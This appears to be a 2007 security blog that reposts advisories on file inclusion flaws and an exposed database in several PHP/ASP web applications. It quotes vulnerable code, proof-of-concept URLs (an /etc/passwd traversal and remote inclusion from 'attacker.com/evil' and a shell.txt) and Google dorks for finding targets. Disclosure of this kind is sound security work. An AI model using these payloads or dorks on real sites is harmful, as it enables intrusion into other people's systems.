Internet Security, Bugtraq list, Web Security

dBlog CMS Open Source database retrieval

2007-09-26T20:59:00.001-07:00

Author: Janek Vind "waraxe"
Date: 19. September 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-52.html

Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.dblog.it/sito/default.asp

DBlog CMS is a open source Content Management System for IIS/ASP platform.
Some days ago dBlog 2.0 hit the goal of the 110.000 platform downloads,
over 100.000 of them regarding the lastest version.

GoogleDork: inurl:"articolo.asp" "powered by dblog"

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

DBlog stores all the data in JET database file with default name "dblog.mdb".
This database file is accessible from web as:

http://www.example.com/mdb-database/dblog.mdb

By fetching database anyone can obtain admin password sha hashes and then try to
crack them and gain admin privileges.
There are some mitigating factors though:

1. IIS webserver can refuse ".mdb" file download
2. database file or directory can be renamed to something else

Quick look @ real world sites shows, that ~ 20% of them are exploitable.
Considering large number of DBlog-based websites, this is serious problem IMHO.

How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

IIS directory restrictions, renaming directory and database file.

Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to pabloski, ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb
and all other people who know me!
Greetings to Raido Kerna.
Tervitusi Torufoorumi rahvale!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

Shameless advertise:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

User Manual Database - http://user-manuals.waraxe.us/
Old Books Online - http://www.oldreadings.com/

Local File Inclusion in Dance Music module for phpNuke

2007-09-26T20:57:00.000-07:00

Author: Janek Vind "waraxe"
Date: 25. September 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-54.html

Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.bestdownload.biz/modules.php?name=Downloads&d_op=viewdownloaddetails
&lid=251&title=Dance%20Music%20for%20PHP-Nuke

Dance Music for PHP-Nuke
by MultiMedia http://www.multimedia.com.ro
and Nicolae Sfetcu http://www.sfetcu.com

Vulnerabilities: Local File Inclusion in "index.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Let's take a peek at source code of "index.php":

------------>[source code]<------------

include("header.php");
...
$ACCEPT_FILE['Acid_house.html'] = 'Acid_house.html';
$ACCEPT_FILE['Alternative_dance.html'] = 'Alternative_dance.html';
$ACCEPT_FILE['Ambient_house.html'] = 'Ambient_house.html';
...
$page = $_GET['page'];
...
$pagename = $ACCEPT_FILE[$page];
if (!isSet($pagename)) $pagename = "index.html";
include("modules/Dance_Music-MM/$pagename");

------------>[/source code]<-----------

As we can see, "$ACCEPT_FILE" array is uninitialized, so we can insert there
arbitrary values from $_GET/$_POST/$_COOKIES parameters, if "register_globals"
is active.

Proof-of-concept test:

http://victim.com/modules.php?name=Dance_Music-MM&page=1
&ACCEPT_FILE[1]=../../../../../../../../../etc/passwd

Warning: main() [function.main]: open_basedir restriction in effect.
File(./modules/Dance_Music-MM/../../../../../../../../../../../../etc/passwd
) is not within the allowed path(s): (/home/www/web32/)
in /home/www/web32/html/portal/modules/Dance_Music-MM/index.php on line 154

So local file inclusion exists, but safe mode can make exploiting harder.

//-----> See ya soon and have a nice day ;) <-----//

Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb
and anyone else who know me!
Greetings to Raido Kerna.
Tervitusi Torufoorumi rahvale!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

PhpHostBot <= 1.06 (svr_rootscript) Remote File Inclusion Vulnerability

2007-09-26T20:27:00.000-07:00

____________________   ___ ___ ________
\_   _____/\_   ___ \ /   |   \\_____  \ 
|    __)_ /    \  \//    ~    \/   |   \
|        \\     \___\    Y    /    |    \
/_______  / \______  /\___|_  /\_______  /
       \/         \/       \/         \/

                                       .OR.ID
ECHO_ADV_83$2007

-----------------------------------------------------------------------------------------
[ECHO_ADV_83$2007] PhpHostBot <= 1.06 (svr_rootscript) Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------

Author         : M.Hasran Addahroni
Date           : August, 4 th 2007
Location       : Australia, Sydney
Web            : http://advisories.echo.or.id/adv/adv83-K-159-2007.txt
Critical Lvl   : Dangerous
Impact        : System access
Where        : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application   : PhpHostBot 
version       : <= 1.06
Vendor        : http://www.idevspot.com/PhpHostBot.php
Description :

PhpHostBot is a webware PHP application which integrates with the popular Cpanel(WHM) web hosting control panel.
PhpHostBot supports Paypal subscriptions, free web hosting, Subdomain and Reseller account setup
and supports both dedicated server and Reseller web hosting companies

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

Input passed to the "svr_rootscript" parameter in order/login.php is not properly verified before being used to include files.
This can be exploited to include arbitrary files from local or external resources.
Successful exploitation requires that "register_globals" is enabled.


Poc/Exploit:
~~~~~~~~~~

http://www.target.com/[PhpHostBot-path]/order/login.php?svr_rootscript=http://attacker.com/evil?

Google Dork:
~~~~~~~~~~~
        "order?page=plan_show"

Solution:
~~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn off register_globals
- use the latest version

Timeline:
~~~~~~~~~

- 27 -07 - 2007 bug found
- 4 - 08 - 2007 vendor contacted
- 7 - 08 - 2007 advisory released
---------------------------------------------------------------------------

Shoutz:
~~~~~
~ ping - my dearest wife, zautha my little son, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative, str0ke (for the best comments)
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry, x16
~ newbie_hacker@yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~~

    K-159 || echo|staff || eufrato[at]gmail[dot]com
    Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

FrontAccounting version 1.13 <= Remote File Inclusion Vulnerability

2007-09-26T20:20:00.000-07:00

#
#Dork:"FrontAccounting"
#
#Vuln Code
##############################################################################################
#
#ERROR1:accsess/login.php
#
#   include_once($path_to_root . "/includes/ui/ui_view.inc"); <<< RFI
#
#
#
#
#BUG1:login.php?path_to_root
#
#Example1:http://site.com/path/accsess/login.php?path_to_root=[[Sh3LLScript]]
#
##############################################################################################
##############################################################################################
#
#ERROR2:includes/lang/language.php
#
#   include_once($path_to_root . "/lang/installed_languages.inc");
#   include_once($path_to_root . "/includes/lang/gettext.php"); <<< RFI
#
#
#
#
#BUG2:includes/lang/language.php?path_to_root
#
#Example2:http://site.com/path/includes/lang/language.php?path_to_root=[[Sh3LLScript]]
#
##############################################################################################
#
#http://sourceforge.net/projects/frontaccounting/
#
##############################################################################################
#
#>>>>>>>>>>>>>>>> coded by K3ZZAP66345<<<<<<<<<<<<<
#
#"Eli mouse tutan herkes kendini haykır zannedio."----------------"Eli opulcek cok insan var."
#
#
#####specialthanx:###..Str0ke..####..KEZZAP66345..####..Wocker..##############################
##############################################################################################

# milw0rm.com [2007-09-26]

Nuke Mobile Entartainment Local File Inclusion

2007-09-25T03:32:00.000-07:00

-----------------------------------------------
# Found by Seph1roth
# http://blackroots.it
-----------------------------------------------

# Vulnerable script download
http://www.suonerie-polifoniche-gratis.net/mobilentertainment.zip

# Bug : http://VICTIM/[path]/data/compatible.php?module_name=[Local File]

# This is the vulnerable code :

# include 'modules/'.$module_name.'compatibility/data/marque.data.php';

sk.log v0.5.3 Remote File Inclusion

2007-09-25T03:28:00.000-07:00

++++++++++++++++++++++++++++++++++++++++++++++++++
+ sk.log v0.5.3 Remote File Inclusion
+ High Risk
+ Found by Seph1roth
+ http://blackroots.it
++++++++++++++++++++++++++++++++++++++++++++++++++

+ Vulnerable Code

+ log.inc.php
+ include_once( "$SKIN_URL/php/logdisplay.inc.php" );

+ Exploit
/php-inc/log.inc.php?SKIN_URL=[Shell]

+ Script Download
http://surfnet.dl.sourceforge.net/sourceforge/sklog/sk.log_v0.5.3.zip

DFD Cart 1.1 Multiple Remote File Inclusion Vulnerabilities

2007-09-23T23:32:00.000-07:00

Vulnerability Type: Remote File Inclusion
Vulnerable file: /dfd_cart/app.lib/product.control/core.php/product.control.config.php
Exploit URL: http://localhost/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: set_depth
Line number: 32
Lines:

----------------------------------------------

require ("".$set_depth."app.lib/product.control/core.php/functions.php");

----------------------------------------------

Vulnerability Type: Remote File Inclusion
Vulnerable file: /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php
Exploit URL: http://localhost/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: set_depth
Line number: 179
Lines:

----------------------------------------------
$category_html = 'form_select';
require ("".$set_depth."app.lib/product.control/core.php/category.list.php");
?>

----------------------------------------------

Vulnerability Type: Remote File Inclusion
Vulnerable file: /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php
Exploit URL: http://localhost/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: set_depth
Line number: 154
Lines:

----------------------------------------------
$category_html = 'form_select';
require ("".$set_depth."app.lib/product.control/core.php/category.list.php");
?>

----------------------------------------------
Multiple Remote Vulnerabilities

GrEeTs To sHaDoW sEcUrItY TeAm & str0ke

FoUnD By BiNgZa

DoRk: :(

shadowcrew@hotmail.co.uk

http://shadow.wizhoo.com/

# milw0rm.com [2007-09-24]

Comment: PHP injection still booming.. beware with your PHP script

Introduction

2007-09-23T23:29:00.000-07:00

Hi all, this blog used to collect about internet security from other site. Enjoy here and you dont need to open many page. :D